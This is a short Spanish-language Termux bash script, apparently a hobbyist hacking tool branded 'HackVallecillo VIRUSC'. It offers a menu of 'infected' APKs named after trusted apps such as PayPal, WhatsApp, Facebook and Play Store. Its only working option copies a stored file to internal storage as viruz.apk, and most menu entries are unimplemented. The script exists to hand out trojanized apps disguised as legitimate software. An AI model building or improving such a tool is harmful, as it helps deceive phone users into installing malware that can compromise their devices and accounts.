#!/data/data/com.termux/files/usr/bin/bash
set -euo pipefail
IFS=$'\n\t'
trap ctrl_c 2

 	R='\033[1;31m'
        G='\033[1;32m'
        Y='\033[1;33m'
        B='\033[1;34m'
        M='\033[1;35m'
        C='\033[1;36m'
        W='\033[0m'


	clear
	echo -e "$R"
	echo '
     | |  | |          | | \ \    / /  | | |         (_) | |
     | |__| | __ _  ___| | _\ \  / /_ _| | | ___  ___ _| | | ___
     |  __  |/ _` |/ __| |/ /\ \/ / _` | | |/ _ \/ __| | | |/ _ \
     | |  | | (_| | (__|   <  \  / (_| | | |  __/ (__| | | | (_) |
     |_|  |_|\__,_|\___|_|\_\  \/ \__,_|_|_|\___|\___|_|_|_|\___/ 
'|lolcat
	echo -e "       $B VIRUSC"
	echo
	printf "$Y"
	echo -e "$C   [1] $Y virus.apk            $C [8] $Y Google.apk"
	echo -e "$C   [2] $Y Calculadora.apk      $C [9] $Y Internet-gratis.apk"
    echo -e "$C   [3] $Y Camara.apk           $C [10] $Y Operamini.apk"
    echo -e "$C   [4] $Y Elite.apk            $C [11] $Y Paypal.apk"
    echo -e "$C   [5] $Y Facebook.apk         $C [12] $Y Playstore.apk"
    echo -e "$C   [6] $Y Galeria.apk          $C [13] $Y Termux.apk"
    echo -e "$C   [7] $Y Gmail.apk            $C [14] $Y Whatsapp.apk"
	echo -e "$C   [15] $R Salir $B"
	echo
	echo


	while read -p "Que APK infectada quieres?  >> " SIGN && [ -z $SIGN ]; do
		printf "$R
		[super🐿] Porfavor escribe un numero valido
		\n $W"
	done


	if [ $SIGN -eq '1' ]; then
		echo
		printf "$C [super]$G Generando Viruz apk$W \n"
		echo
		echo
		cd $PREFIX/bin/modulos
                sleep 3
		cp $PREFIX/bin/modulos/virus.jpg /sdcard
		mv /sdcard/virus.jpg /sdcard/viruz.apk
		echo
		printf "$G \n \t Listoo Ahora esta en tu memoria interna!!"
		echo
		printf "$C presiona en $G enter $C para continuar"
		echo
		read enter
		virusc


	elif [ $SIGN -eq '15' ]; then
	        echo
		echo
		printf "$C Gracias por usar la herramienta \\n"
		echo
		echo
		printf "$C Atentamente HackVallecillo \\n"
		echo
		echo


	else
	       bash $PREFIX/bin/virusc

       fi
